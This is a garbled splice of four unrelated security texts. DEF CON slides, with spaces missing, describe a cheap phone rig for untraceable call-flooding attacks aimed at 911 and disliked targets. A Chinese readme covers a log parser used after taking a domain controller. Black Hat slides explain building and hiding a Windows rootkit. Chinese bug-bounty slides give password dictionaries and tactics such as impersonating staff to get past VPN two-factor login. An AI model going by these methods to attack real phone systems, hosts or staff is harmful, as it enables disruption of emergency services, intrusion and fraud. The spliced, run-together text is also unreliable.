OperatingSystemsCDMA1X800/1900MHz DigitalOnlySamsungU365akaGusto2 QSC6055192MHzprocessor, Weaponized platform WorksonallvaluetierQualcommQSC60XX. Thedevelopereditionsofthesemodelssupportboot loaderunlocking,allowingtheusertovoluntarily voidthemanufacturerwarrantytoallowinstallation ofcustomkernelsandsystemimagesnotsignedby authorizedparties.However,theconsumereditions shipwithalockedbootloader,preventingthese typesofmodifications.Untilnow… QSC6055192MHzprocessor.ComeswithSecure Boot,SEE,SFS Noapplicationprocessorveryeasy securitytobypass.(Explained) GreatEasyDevelopmentSoftware. WritteninC/C++ BREWprovidestheabilitytocontrolvoicemailand theactivationordeactivationofdevicesbyBREW applications.Thiscapabilitywillbeprovidedby defaultiftheUIisrunsontopofBREW. The developerwillprovidethecapabilitytoprogram valuesforthesetofBREWconfigurationparameters usingtheProductSupportTool(PST). ExploitInIRingerMgr allowsfor interactionwithclamandspeaker manipulationsuchaspickingup callinsteadofplayingaringtone. BREWprovidestheIRingerMgr interfacethatallowsadeveloperto integratetheirnativeringer applicationwithBREW.ThisenablesBREW applicationdeveloperstodownloadringersand manageringersonthedevice.IRingerMgr allows assigningofringersfromaBREWapplicationtobe activeandutilizedforincomingcalls(particular categories). ClamtypephonesreferFlipphones.Onthese devices,someApplications,multimedia applicationsforexample,mayneedtoaltertheir functionaluseofhardwareorservices. Sotheringtonepayloadsareabletobypass triggersandeventscausedbyphonehardware providedbythedevicedependinguponevents generatedbytheactionoftheuser. SecondarydisplayFordevicessupportinga secondarydisplay,thedisplaywillbemade availabletoapplicationsrequiringdisplay serviceswhentheclamisclosed.Sothephoneis stillabletobefullyinteractedwithatno additionalbatterycost. Modifiedexecutableallowsforthesoftwaretobe pushedtothedevicebypassingsecurityfeature easilyusingaloopholewithinthecertificate expirationprocess. Thiserrorisexploitedbyrunningthe modifiedexecutablewhiletheotherdevice isinstalledwithavalidsigneddriver. OncethedriverisupdatedonthePCthis allowsfullattacksurfacesupport. Driversanddeviceinformationare supportedbyanowexpiredcertificate. Certificateexpiredin2012whichallowed metobypasssecurityfeaturesets. Modifieddriverfilesallowmodifications ofalldeviceinformation. PRL(PreferredRoamingList)arepulledfromthe deviceactivity.YoucansetjumptimeofthePRL listandturnofforlocktheGPSpositionofthe devicemakingitpracticallyuntraceable. Youcandevelopapplicationsfortheattackplatform byemulatingthesoftwareoncustomwrittenplatform emulatorsprovidedforOEMdevelopers FullplatformforemulationofU365device Testingyourapplicationswithouthavingtoload themonthedevice.Thiseffectivelymakesita developmenthandsetattackplatform Nowthatyouhaveyourownfully unlockedplatform,whatnow… OEMDevelopmentPlatform Weaponized DevelopmentPlatform Withattackplatformloadedonthephone youhavefullcontrolofalldeviceson thephoneincludingTDOS,Brickmode etc. Settingupringtonesasyour specificpayloads. Settingringtoneswilltriggerthemalformed ringtoneprocessesontheeventsthattriggerthem. CheeseBox? Callonephonenumber.Thecallispassedoffvia Bluetoothtoasecondphone.Thesecondphonecalls yourintendednumbercreatinganearlyuntraceable phoneproxy. Weaponized Phonecallstargetnumber(s) 3timesinarowandrecordsanMP3toa BluetoothconnectedPCthe3rd callthat shouldgostraighttovoicemail. FilescreatedwithBluetoothconnection OutputofS2Textfiles RunMP3throughspeechtotextopensourcesoftware Phonescriptwillcallinandusethe inputinformationfromthelistto activatelineofservice. ThisPrepaidCellPhoneCanDeny LegitimatePhoneCallsfor5Days Straight • AnonymousPurchase • 2DollarsDaysThatitisUsed • UntraceableCanbeChargedWith SolarUSBChargerPRLListHopping. • Easilyhiddeninsidelightfixtureat publiclyaccessiblefacility • Totalinvestmentfora5dayTDOS attackplatformis$20USDwith SolarUSBcharger PhoneBeingturnedintoCALLBOMBER FirmwareandPRLBeingUpdated PluggedintoLaptopandReflashed inunder8min. CrashingofcallsoftwarebyTDOS Launchingof10phoneswith weaponized platform CPUandramutilizationcrashescall centerVM ScenariosofTDOS • Block911system • Alarmcompaniesforbreakins • Federalagenciesduringterroristattack • Storesduringholidayseasons • Anypersonororganizationthatisdisliked ThanksForInvitingMeandForYourTime AnyQuestionsFeelFreetoContactMe. Westonheckerdefcon@gmail.com Westonhecker@twitter PhoneNumber701…NeverMind SpecialthankstoMyWifeandfamily Thebigguyintheskyforacoolnameforcomputer security TimHelpwithschpelling onfinaleddit BestFriendScott HiMom
这本来只是是我写的⼯具⾥⾯⼀个插件 后⾯那个⼯具bug太多就没有维护了,有⼀个需求就把这个插件摘出来改 了⼀下。 需求是拿到域内控制器的权限,但是要定位域内⽤户的ip,找了市⾯上的⼯具基本都是扔到域控上去执⾏,在域控 上执⾏难免会再产⽣额外的⽇志,如果脱⽇志回来的话⼤部分程序都不允许指定⽇志⽂件,所以写了这个简单的 ⼯具脱⽇志回来本地解析⽇志,如果本地解析的话⽤LogParser⾸先参数太复杂,并且移植性相较差,并且这个⼩ 插件还可以根据⾃⼰的需求环境进⾏简单的改动。 主要功能是解析evtx⽂件,调⽤的evtx的模块编写的,原有的evtx模块使⽤起来较为麻烦于是⾃⼰编写了那么⼀个 ⼯具。⼀般使⽤场景如: 拿到预控时读取域内主机对应的ip、应急时获取⽬标⽇志信息、查询3389对外登陆⽇志等 , 由于是读⽂件解析后再循环获取⽇志id,⽇志⽂件过⼤时可能会慢⼀点,所以需要稍微等待⼀会,之前的需求是默 认读取的4624⽇志,可以根据需求⾃⾏改动,可以将对⽅的⽇志⽂件脱回到本地或者是放在服务器上运⾏,在服 务器运⾏会默认读取 C:\Windows\System32\winevt\Logs\Security.evtx 使⽤⽅法: main.exe Security.evtx 注意 如果在win32 环境编译⽆法在64位环境下运⾏ 会提示没有此⽂件 参考:https://github.com/0xrawsec/golang-evtx
Demystifying Modern Windows Rootkits Bill Demirkapi Independent Security Researcher 1 Demystifying Modern Windows Rootkits – Black Hat USA 2020 Who Am I?  18 years old  Sophomore at the Rochester Institute of Technology  Windows Internals  Mostly self-taught (with guidance)  Strong “Game Hacking” background 2 Demystifying Modern Windows Rootkits – Black Hat USA 2020 What Is This Talk About? In this talk, we’ll go over…  Loading a rootkit.  Communicating with a rootkit.  Abusing legitimate network communications.  An example rootkit I wrote and the design choices behind it.  Executing commands from kernel.  Tricks to cover up the filesystem trace of your rootkit. Demystifying Modern Windows Rootkits – Black Hat USA 2020 3 Introduction to Windows Rootkits Demystifying Modern Windows Rootkits – Black Hat USA 2020 4 Windows Rootkits: An Overview Why would you want to use a rootkit?  Kernel drivers have significant access to the machine.  Same privilege level as a typical kernel anti-virus.  Less mitigations and security solutions targeting kernel malware.  Anti-Virus often have less visibility into operations performed by kernel drivers.  Kernel drivers are often ignored by anti-virus. Demystifying Modern Windows Rootkits – Black Hat USA 2020 5 Example: Treatment by Anti-Virus Anti-virus tends to treat kernel drivers with significant trust compared to user-mode applications. Demystifying Modern Windows Rootkits – Black Hat USA 2020 6 Excerpt from Carbon Black’s Process/Thread Handle callbacks Excerpt from Malwarebytes’ Process/Thread Handle callbacks Loading a Rootkit Demystifying Modern Windows Rootkits – Black Hat USA 2020 7 Abuse Legitimate Drivers There are a lot of “vulnerable” drivers. With some reversing knowledge, finding a “0-day” in a driver can be trivial. Examples include…  Capcom’s Anti-Cheat driver  Intel’s NAL Driver  Microsoft themselves! Demystifying Modern Windows Rootkits – Black Hat USA 2020 8 Abuse Legitimate Drivers Using legitimate drivers has quite a few benefits too:  You only need a few primitives to escalate privilege.  Finding a “vulnerable” driver is relatively trivial (OEM Drivers ).  Difficult to detect due to compatibility reasons. Demystifying Modern Windows Rootkits – Black Hat USA 2020 9 Abuse Legitimate Drivers Abusing legitimate drivers comes with some strong drawbacks too…  Major issue of compatibility across operating system versions depending on the primitives you have.  Much more likely to run into stability issues.  The last thing you want is your malware to BSOD a victim. Demystifying Modern Windows Rootkits – Black Hat USA 2020 10 Just Buy a Certificate! For some red teamers, buying a legitimate code signing certificate might be a good option.  Useful for targeted attacks.  No stability concerns. But…  Potentially reveals your identity.  Can be blacklisted. Demystifying Modern Windows Rootkits – Black Hat USA 2020 11 Abuse Leaked Certificates Instead of buying a certificate yourself, why not just use one from someone else?  There are quite a few public leaked certificates available to download.  Almost has all the benefits of buying one without deanonymization. But…  The leaked certificate you use can be detected in the future.  If the certificate was issued after July 29th, 2015, it won’t work on secure boot machines running certain versions of Windows 10. Demystifying Modern Windows Rootkits – Black Hat USA 2020 12 Abuse Leaked Certificates In most cases, Windows doesn’t care if your driver has a certificate that has expired or was revoked. Demystifying Modern Windows Rootkits – Black Hat USA 2020 13 Abuse Leaked Certificates Several leaked certificates are already publicly posted, but it’s not impossible to find your own. Demystifying Modern Windows Rootkits – Black Hat USA 2020 14 Abuse Leaked Certificates Oh and the best part…. most of them are undetected by the bulk of AV: Demystifying Modern Windows Rootkits – Black Hat USA 2020 15 Communicating with a Rootkit Demystifying Modern Windows Rootkits – Black Hat USA 2020 16 Beacon Out to a C2 A tried and true method that comes with some downsides is to “call home”.  Firewalls can block or flag outgoing requests to unknown/suspicious IP Addresses or ports.  Advanced Network Inspection can catch some exfiltration techniques that try to “blend in with the noise”. Demystifying Modern Windows Rootkits – Black Hat USA 2020 17 Open a Port Some malware takes the route that the C2 connects to the victim directly to control it.  Relatively simple to setup. But…  Could be blocked off by a firewall.  Difficult to “blend in with the noise”. Demystifying Modern Windows Rootkits – Black Hat USA 2020 18 Application Specific Hooking More advanced malware may opt to hook a specific application’s communication as a channel of communication.  Difficult to detect, especially if using legitimate protocol. But…  It’s not very flexible.  A machine might not have that service exposed. Demystifying Modern Windows Rootkits – Black Hat USA 2020 19 Choosing a Communication Method What I want… 1. Limited detection vectors. 2. Flexibility for various environments. My assumptions… 1. Victims machines will have some services exposed. 2. Inbound and outbound access may be monitored. Demystifying Modern Windows Rootkits – Black Hat USA 2020 20 Choosing a Communication Method Application Specific Hooking was perfect for my needs, except for the flexibility. Is there anyway we could change Application Specific Hooking to where it isn’t dependent on any single application? Demystifying Modern Windows Rootkits – Black Hat USA 2020 21 Abusing Legitimate Communication What if instead of hooking an application directly, we…  Hook network communication, similar to tools like Wireshark.  Place a special indicator in “malicious” packets, a “magic” constant.  Send these “malicious” packets to legitimate ports on the victim machine.  Search packets for this “magic” constant to pass on data to our malware. Demystifying Modern Windows Rootkits – Black Hat USA 2020 22 Hooking the User-Mode Network Stack Demystifying Modern Windows Rootkits – Black Hat USA 2020 23 Hooking the Windows Winsock Driver  A significant amount of services on Windows can be found in user- mode, how can we globally intercept this traffic?  Networking relating to WinSock is handled by Afd.sys, otherwise known as the “Ancillary Function Driver for WinSock”.  Reversing a few functions in mswsock.dll revealed that a bulk of the communication was done through IOCTLs. If we could intercept these requests, we could snoop in on the data being received. Demystifying Modern Windows Rootkits – Black Hat USA 2020 24 How Do Irps Know Where to Go? When you call NtDeviceIoControlFile on a file handle to a device, how does the kernel determine what function to call? Demystifying Modern Windows Rootkits – Black Hat USA 2020 25 Standard Methods of Intercepting Irps There are a few ways we can intercept Irps, but let’s look at two common methods. 1. Replace the Major Function you’d like to hook in the driver’s object. 2. Perform a code hook directly on the dispatch handler. Demystifying Modern Windows Rootkits – Black Hat USA 2020 26 Picking a method To pick the best method of hooking, here are a few common questions you should ask.  How many detection vectors are you potentially exposed to?  How "usable" is the method?  How expensive would it be to detect the method? Demystifying Modern Windows Rootkits – Black Hat USA 2020 27 Hook a Driver Object  How many detection vectors are you potentially exposed to?  Memory artifacts.  How “usable” is the method?  For stability, by replacing a single function with an interlocked exchange, this method should be stable.  For compatibility, driver objects are well-documented and easy to find.  How expensive would it be to detect the method?  Inexpensive, all anti-virus would need to do is enumerate loaded drivers and check that the major functions are within the bounds of the driver. Demystifying Modern Windows Rootkits – Black Hat USA 2020 28 Hook a Driver’s Dispatch Function  How many detection vectors are you potentially exposed to?  Memory artifacts.  How “usable” is the method?  Unless the function is exported, you will need to find the function yourself.  Not all drivers are compatible with this method due to PatchGuard.  HVCI incompatible.  How expensive would it be to detect the method?  Potentially inexpensive and several methods to detect hooking. Demystifying Modern Windows Rootkits – Black Hat USA 2020 29 Hooking File Objects I wanted a method that was…  Undocumented.  Stable.  Relatively expensive to detect. What if instead of hooking the original driver object, we hooked the file object instead? Demystifying Modern Windows Rootkits – Black Hat USA 2020 30 How Do Irps Know Where to Go? typedef struct _FILE_OBJECT { CSHORT Type; CSHORT Size; PDEVICE_OBJECT DeviceObject; ... } FILE_OBJECT; Demystifying Modern Windows Rootkits – Black Hat USA 2020 31 To retrieve the device associated with the Afd driver, the kernel calls IoGetRelatedDeviceObject. What’s stopping us from overwriting this pointer? Hooking File Objects What we can do is… 1. Create our own device object and driver object. 2. Patch our copy of the driver object. 3. Replace the DeviceObject pointer of our file object with our own device. Let’s talk about how we would go about doing this. Demystifying Modern Windows Rootkits – Black Hat USA 2020 32 Hooking File Objects Let’s start by finding a file object to hook. We’re after handles to \Device\Afd, but how can we find these objects? Demystifying Modern Windows Rootkits – Black Hat USA 2020 33 typedef enum _SYSTEM_INFORMATION_CLASS { ... SystemHandleInformation, ... } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; Hooking File Objects The SystemHandleInformation class allows us to query all handles on the system, including…  The process ID the handle belongs to.  The kernel pointer of the object associated with the handle. If we open the Afd device ourselves, we can easily recognize file objects that are for the Afd device. Demystifying Modern Windows Rootkits – Black Hat USA 2020 34 Hooking File Objects Before we can overwrite the DeviceObject member, we need to create our fake objects first. Fortunately, the kernel exports the function it uses itself to create these objects. All we need to do is call ObCreateObject passing the IoDriverObjectType or IoDeviceObjectType to create our fake objects. We can copy the existing objects over to contain the same member values. Demystifying Modern Windows Rootkits – Black Hat USA 2020 35 Hooking File Objects With our fake objects created, we’re almost ready to set the DeviceObject of the file object. First though, we need to hook our driver object. We can use the standard “Hook a Driver Object” method, except instead of performing it on the original driver object, we’ll use it on a fake driver object used exclusively for our hooks. Demystifying Modern Windows Rootkits – Black Hat USA 2020 36 Hooking File Objects To prevent race conditions while replacing the device object member, the original device object we use inside of our hooked dispatch must be set at the same time we the DeviceObject member of the file object. To do this, simply perform an interlocked exchange of the original device object and the device object our hook uses. Demystifying Modern Windows Rootkits – Black Hat USA 2020 37 Hooking File Objects Now that we’ve hooked the file object, there is not much work left. In our dispatch hook, we need to… 1. Check if we are hooking the MajorFunction being called. 1. If we are, call the hook function passing the original device object and original dispatch function for that MajorFunction. 2. Make sure to restore the original DeviceObject when the MajorFunction is IRP_MJ_CLEANUP. Demystifying Modern Windows Rootkits – Black Hat USA 2020 38 Hooking File Objects  How many detection vectors are you potentially exposed to?  Memory artifacts.  How “usable” is the method?  Most of the functions we use are at least semi-documented and unlikely to change significantly.  How expensive would it be to detect the method?  Expensive, an anti-virus would have to replicate our hooking process and enumerate file objects to determine if the device/driver object was swapped. Demystifying Modern Windows Rootkits – Black Hat USA 2020 39 How the Spectre Rootkit Abuses the User-Mode Network Stack Demystifying Modern Windows Rootkits – Black Hat USA 2020 40 Abusing the Network Using the File Object hook, we can now intercept Irps to the Afd driver. This allows us to…  Intercept all user-mode networking traffic.  Send and receive our own data over any socket. Demystifying Modern Windows Rootkits – Black Hat USA 2020 41 Abusing the Network To review, our existing plan is to…  Hook network communication, similar to tools like Wireshark.  Place a special indicator in “malicious” packets, a “magic” constant.  Send these “malicious” packets to legitimate ports on the victim machine.  Search packets for this “magic” constant to pass on data to our malware. How can we actually retrieve the content of packets that are received? Demystifying Modern Windows Rootkits – Black Hat USA 2020 42 Abusing the Network For receive operations, an IOCTL with the code IOCTL_AFD_RECV is sent to the Afd driver. Here is the structure sent in the input buffer. Demystifying Modern Windows Rootkits – Black Hat USA 2020 43 typedef struct _AFD_RECV_INFO { PAFD_WSABUF BufferArray; ULONG BufferCount; ULONG AfdFlags; ULONG TdiFlags; } AFD_RECV_INFO, * PAFD_RECV_INFO; typedef struct _AFD_WSABUF { UINT len; PCHAR buf; } AFD_WSABUF, * PAFD_WSABUF; Parsing Packets: Design Let’s talk about how the Spectre Rootkit was designed. Demystifying Modern Windows Rootkits – Black Hat USA 2020 44 Spectre Rootkit Packet Structure Any prepended data Magic Constant Base Packet Structure Optional Custom Structure Any appended data Parsing Packets: Pre-Processing Here is the process used when the Spectre Rootkit receives a packet. Demystifying Modern Windows Rootkits – Black Hat USA 2020 45 Parsing Packets: Processing Demystifying Modern Windows Rootkits – Black Hat USA 2020 46 Before dispatching a packet, we need to create a complete packet. Packet Handlers Before we go any further, let’s talk about the concept of “Packet Handlers” in the Spectre Rootkit. Demystifying Modern Windows Rootkits – Black Hat USA 2020 47 Packet Handlers An example of a packet handler included with the Spectre Rootkit is the PingPacketHandler. This handler is used to determine if a machine/port is infected. The incoming packet has no actual data, other than indicating its Type is a Ping. The handler responds to the client with an empty base packet with the Type set to Ping. Demystifying Modern Windows Rootkits – Black Hat USA 2020 48 Parsing Packets: Dispatching Once a packet is completely populated, the “packet dispatcher” will… Here’s why the “packet dispatcher” is awesome: by passing a pointer to itself to the relevant packet handler, that packet handler can recursively dispatch a new packet! Demystifying Modern Windows Rootkits – Black Hat USA 2020 49 Packet Handlers: XorPacketHandler The best way to explain the recursive nature of the “packet dispatcher” is through an example, such as the XorPacketHandler. The XorPacketHandler takes a XOR_PACKET structure: This XOR_PACKET does not actually perform a malicious operation. Instead, it acts as an encapsulating packet. Demystifying Modern Windows Rootkits – Black Hat USA 2020 50 Packet Handlers: XorPacketHandler When the XorPacketHandler receives a packet, it will… 1. Use the XorKey to deobfuscate the XorContent. 2. Recursively dispatch the XorContent as a new packet. The model that the Spectre Rootkit uses allows you to create infinite layers of encapsulation. Demystifying Modern Windows Rootkits – Black Hat USA 2020 51 Executing Commands Let’s take a look at how we can execute commands from our rootkit, a common feature seen in a variety of Windows malware. Before we get into starting a process from a kernel driver, it’s important to understand how we would execute commands from a user-mode context. Demystifying Modern Windows Rootkits – Black Hat USA 2020 52 Executing Commands: User-mode Demystifying Modern Windows Rootkits – Black Hat USA 2020 53 Executing Commands: Kernel-mode Let’s start by creating the pipes we need to obtain output. Here is what CreatePipe does in the background… Demystifying Modern Windows Rootkits – Black Hat USA 2020 54 Executing Commands: Kernel-mode Now that we have pipes, we need to create the actual process. We’ll use ZwCreateUserProcess because that’s what kernelbase.dll uses itself to create processes. Let's start with the attribute list for the process.  The most important attribute we have to set is PsAttributeImageName. This will specify the image file name for the new process. Demystifying Modern Windows Rootkits – Black Hat USA 2020 55 Executing Commands: Kernel-mode Next, we have to fill out a RTL_USER_PROCESS_PARAMETERS structure for the process. In this structure, we need to set… 1. The window flags and the output handles to our pipes. 2. The current directory, the command line arguments, the process image path, and the default desktop name. Demystifying Modern Windows Rootkits – Black Hat USA 2020 56 Executing Commands: Kernel-mode From there, all it takes is a call to ZwCreateUserProcess to start the process. Once the process has exited, similar to what we do in user-mode, we can call ZwReadFile to read the output from the unnamed pipe. Demystifying Modern Windows Rootkits – Black Hat USA 2020 57 Hiding a Rootkit Demystifying Modern Windows Rootkits – Black Hat USA 2020 58 Introduction to Mini-Filters Mini-filter drivers allow you to attach to volumes and intercept certain file I/O. This is performed by registering with the Filter Manager driver. Demystifying Modern Windows Rootkits – Black Hat USA 2020 59 Source: Microsoft Docs Introduction to Mini-Filters Mini-filters can be useful to mask the presence of our rootkit on the filesystem. For example, a mini-filter can direct all file access for a certain file to another file. We can use this functionality to redirect access to our driver file to another legitimate driver. Demystifying Modern Windows Rootkits – Black Hat USA 2020 60 Picking a method To pick the best method of hooking, here are a few common questions you should ask.  How many detection vectors are you potentially exposed to?  How "usable" is the method?  How expensive would it be to detect the method? Demystifying Modern Windows Rootkits – Black Hat USA 2020 61 Become a Mini-Filter The easiest way to abuse the functionality of a mini-filter is to become one yourself. Here are the minimum requirements for FltRegisterFilter: 1. Create [ServiceKey]\Instances 2. Create [ServiceKey]\Instances\[An instance name] 3. In [ServiceKey]\Instances add a “DefaultInstance” and set it to your instance name used in step 2. 4. In [ServiceKey]\Instances\[An instance name], add the “Altitude” and “Flags” values. Demystifying Modern Windows Rootkits – Black Hat USA 2020 62 Become a Mini-Filter  How many detection vectors are you potentially exposed to?  Registry and memory artifacts.  How “usable” is the method?  No concerns from stability or usability, this is how other legitimate drivers register as mini-filters.  How expensive would it be to detect the method?  Inexpensive. Besides the registry artifacts, drivers that are registered as mini- filters can easily be enumerated through API such as FltEnumerateFilters. Demystifying Modern Windows Rootkits – Black Hat USA 2020 63 Hook a Mini-Filter Another method is to simply hook an existing mini-filter. There are a couple of routes you could take.  Code hook the callback for an existing filter.  Overwrite the FLT_REGISTRATION structure before the victim driver uses it to have your own callback.  DKOM an existing filter instance and replace the original callback with yours. Demystifying Modern Windows Rootkits – Black Hat USA 2020 64 Hook a Mini-Filter: Code Hook One of the easiest way to intercept callbacks to an existing mini-filter is to simply perform a code hook. This can be as simple as a jmp hook, but it comes with quite a few drawbacks, similar to those we saw in an earlier section where we discussed intercepting Irps. Demystifying Modern Windows Rootkits – Black Hat USA 2020 65 Hook a Mini-Filter: Code Hook  How many detection vectors are you potentially exposed to?  Memory artifacts.  How “usable” is the method?  Unless the function is exported, you will need to find the function yourself.  Not all drivers are compatible with this method due to PatchGuard.  HVCI incompatible.  How expensive would it be to detect the method?  Potentially inexpensive and several methods to detect hooking. Demystifying Modern Windows Rootkits – Black Hat USA 2020 66 Hook a Mini-Filter: DKOM A semi-documented method of hooking an existing mini-filter is through DKOM. You can enumerate filters and instances through the documented APIs FltEnumerateFilters and FltEnumerateInstances. The function that gets called for a certain operation is specified in the CallbackNodes array in the FLT_INSTANCE structure. Demystifying Modern Windows Rootkits – Black Hat USA 2020 67 Hook a Mini-Filter: DKOM  The CallbackNodes array index is associated with the major function you’re hooking. Demystifying Modern Windows Rootkits – Black Hat USA 2020 68 Hook a Mini-Filter: DKOM  How many detection vectors are you potentially exposed to?  Memory artifacts.  How “usable” is the method?  For stability, although obtaining a FLT_INSTANCE structure is documented, the FLT_INSTANCE structure itself is undocumented.  How expensive would it be to detect the method?  Inexpensive, an anti-virus would need to occasionally enumerate registered filters and their instances for hooks in the CallbackNodes array. Demystifying Modern Windows Rootkits – Black Hat USA 2020 69 Example: Abusing a Mini-Filter Let’s say you want to protect a certain file, what’s an example of redirecting access to it? Demystifying Modern Windows Rootkits – Black Hat USA 2020 70 Wrap Up Demystifying Modern Windows Rootkits – Black Hat USA 2020 71 Thanks to... Alex Ionescu (@aionescu)  Long-time mentor very experienced with Windows Internals. ReactOS  A fantastic reference for undocumented functions and structures. Nemanja Mulasmajic (@0xNemi) and Vlad Ionescu (@ucsenoi)  Helped review this presentation. Demystifying Modern Windows Rootkits – Black Hat USA 2020 72 Contact / Questions Thanks for sticking around! Now is the time for any questions. Twitter @BillDemirkapi Blog https://billdemirkapi.me Spectre Rootkit https://github.com/D4stiny/spectre Demystifying Modern Windows Rootkits – Black Hat USA 2020 73
Security Response Center 吴 永 佳 国内SRC的漏洞趋势变化 及漏洞挖掘的一些思路分享 关于我 一名白帽子 常用ID getshell1993 曾活跃于多个第三方漏洞平台及众测平台 曾活跃于多个SRC漏洞平台 SogouSRC BaiduSRC 360SRC CainiaoSRC WifiSRC TuniuSRC MeizuSRC DouyuSRC Wooyun Xianzhi Allsec DidiSRC MobikeSRC NcfSRC SinaSRC LenovoSRC LetvSRC …… 国 内 S R C 的 漏 洞 趋 势 变 化 1 Past Now 传统漏洞企业自动化扫描检测越来越成熟 大型互联网企业开发人员安全意识逐步提升 SDLC、RASP、WAF、HIDS、蜜罐、统一认证…… 传统漏洞 挖掘成本越来越高 大型互联网企业安全团队不断壮大 开发框架安全性正在逐步提升 2016年发生的两件对国内信息安全行业产生颠覆式影响的大事 2 多 关 注 那 些 容 易 被 忽 视 的 资 产 常规资产信息收集手段 如,IP端口扫描、同网段扫描、子域名的各类收集方式及爆破等等 当然对SRC厂商子域名和IP端口变化的监控非常重要 但是,这次我要介紹一些在平常测试中容易被忽略的企业资产 关于企业资产还应多关注以下重灾区: 非普通用户使用的系统 企业使用的外部第三方系统和比较隐蔽的系统 企业的微信公众号/小程序 企业的支付宝生活号/小程序 APP Store 安卓市场的所有APP+内部APP 各省市分公司的自建站点 ……………… 注册账号要提供这么多信息? 放弃,放弃,关闭页面,关闭浏览器,再见 非个人用户使用的系统 媒体认证 卖家认证 企业认证 开发者认证 医生认证 Vip账号 作者认证 主播认证 司机认证 突破常规不走寻常路 当大家都朝着一个固定的方向去发现问题时,而你却独自朝相反的方向探索,往往会有惊喜 非普通用户使用的系统 部分平台审核不严,很多情况下提供资料注册即可通过或简单电话验证即可通过 想办法提供各类资料注册(注册公司/购买营业执照;网上公开信息收集;PS) 注册不了的想办法获取到账号(爆破/撞裤;套路社工在线客服/人工客服;文库/QQ群/github泄漏等) 借账号/租账号/买账号(在部分情况下也可以当威胁情报提交) 有些账号也可以花几十块钱在某宝上或QQ群上购买 营业执照可以轻易购买 有些账号也可以通过信息泄露方式获取 柳暗花明又一村 漏洞多,通过率接近100%,美滋滋 18年提交的部分SRC漏洞 非普通用户注册使用系统的漏洞 企业使用的外部第三方系统和比较隐蔽的系统 有时通过网络空间资产搜索企业信息会有惊喜 如FOFA、SHODAN…… 以及各类搜索引擎…… 比如此类惊喜 企业使用的外部第三方系统和比较隐蔽的系统 以平安为例 企业使用的外部第三方系统和比较隐蔽的系统 以平安为例 也可以根据其证书,header信息,备案号等信息搜索…… 企业使用的外部第三方系统和比较隐蔽的系统 以平安为例 企业使用的外部第三方系统和比较隐蔽的系统 18年提交的部分SRC漏洞 第三方系统漏洞 关于国内SRC 选择大于努力系列 同个第三方厂商系统 三家SRC奖励分别是40000、1000、450 适用大型企业SRC,业务多,资产复杂 关键词搜索+账号主体过滤 关注企业每个业务、每个分公司对应的微信公众号 新活动,新业务上线往往会有公众号消息推送 企业的微信/支付宝公众号+小程序+APP 企业的微信/支付宝公众号+小程序+APP 以平安为例 以平安为例 ………… 企业的微信/支付宝公众号+小程序+APP 企业的微信/支付宝公众号+小程序 18年提交的部分SRC漏洞公众号/小程序/APP相关漏洞 XXXX微信存储XSS打到大量cookie XXXX微信一处遍历企业信息 XXXX任意绑定账号可查看任意手机号订单信息 XXXX微信端整站订单泄露 XXXX公众号商城存在SQL注入 XXXX分公司公众号可getshell XXXX微信端越权可导致整站用户地址信息泄露 XXXX小程序XSS盲打到进入后台 XXXX微信小程序越权使用他人优惠券导致0元支付 XXXX微信端一处任意文件读取+SSRF XXXX小程序越权查看整站订单信息 XXXXAPP城支付漏洞可控制订单金额 XXXXAPP某处用户信息泄露 …… 人 是 最 大 的 漏 洞 3 Github信息泄露监控 基于代码搜索关键字匹配(域名/兄弟域名/内网域名/企业内部密码……) https://github.com/0xbug/Hawkeye https://github.com/MiSecurity/x-patrol https://github.com/VKSRC/Github-Monitor ……………… 另类思路 从GitHub的账户出发,通过邮箱进一步获得对应的用户名 混入内部QQ群等>提取QQ号>关联邮箱>关联用户名 git config user.email ******** 通过人的关系来获得一些代码搜索不具有的优势 思路来源:https://www.freebuf.com/articles/web/198721.html 定制厂商专属的用户名字典 前期信息收集,确认厂商员工账号命名规则,制定精准用户名字典(搜索引擎/whois/名片/github/招聘网站) 我认识的朋友中叫李伟的有四个,叫李冰的有三个,叫李倩的有两个…… 假如一个大企业里有数千员工,数万员工,甚至数十万员工…… 那么这个企业里员工姓名相同的肯定很多…… 于是员工的帐号就很可能会这样命名 liwei liwei01 liwei02 liwei03 liwei-s libing libing01 libing02 libing03 libing-s Top10000姓名生成对应字典 账号弱口令问题 制定专属的密码字典(弱密码/高强度弱密码) 部分系统有账号锁定机制,爆破需谨慎,可通过单一密码+账号尝试爆破 从简到杂递进进行尝试(用户名/域名/兄弟域名+数字+符号+年份+键盘密码字典) domain123 domain1234 domain666 domain888 domain2018 domain2019 domain@123 domain@1234 domain@666 domain@888 domain@2018 domain@2019 domain&123 domain&1234 domain&666 domain&888 domain&2018 domain&2019 …… Domain123 Domain1234 Domain666 Domain888 Domain2018 Domain2019 Domain@123 Domain@1234 Domain@666 Domain@888 Domain@2018 Domain@2019 Domain&123 Domain&1234 Domain&666 Domain&888 Domain&2018 Domain&2019 …… username123 username1234 username666 username888 username2018 username2019 username@123 username@1234 username@666 username@888 username@2018 username@2019 username&123 username&1234 username&666 username&888 username&2018 username&2019 …… !QAZ2wsx !QAZ@WSX !QAZxsw2 !QAZXSW@ 1qaz@WSX 1qazXSW@ 1qaz@wsx @WSX1qaz @WSXzaq1 @WSX3edc 2wsx#EDC 2wsx!QAZ 2wsxCDE# 2wsxZAQ! Qwer!234 Qwer1234 Asdf!234 Asdf1234 …… Aa123456 aA123456 Aa654321 Aa666666 Aa888888 root@123 root@2019 Root1234 Root2019 Admin123 Admin2019 admin@123 admin@1234 admin@2019 Passw0rd P@ssword p@ssw0rd …… 123456789 a123456 123456 a123456789 1234567890 woaini1314 qq123456 abc123456 123456a 123456789a 147258369 zxcvbnm test1234 987654321 12345678910 abc123 qq123456789 123456789. …… 账号弱口令问题 社工相关 根据我的个人经验尝试,成功率极高 部分成功案例 qq小号伪装成内部员工通过入群申请,混入企业内部QQ群,在群里和开发人员交流技术,蹲点一个 多月,最终获取到内部敏感信息提交SRC 通过给某企业IT部门打电话,重新解绑vpn手机号,绕过vpn双因素进入内网 多次发一些链接给客服小姐姐点击,进一步进入某些系统 给在线客服打电话说要购买服务想先试用系统,进一步获取到系统测试账号密码 到某企业办公楼层连接wifi,通内网 社工有风险,切勿模仿,记得先跟厂商安全人员沟通报备 一 些 高 频 出 现 的 漏 洞 4 文档上传存在XXE漏洞(某SRC案例回顾-漏洞已修复) 上传xlsx/docx文档的功能很可能存在XXE漏洞 从office2007版本开始引入XML文件格式 poi-ooxml.jar xlsx-streamer.jar …… 碰到文档的上传点可以用构造的恶意文件盲打试试 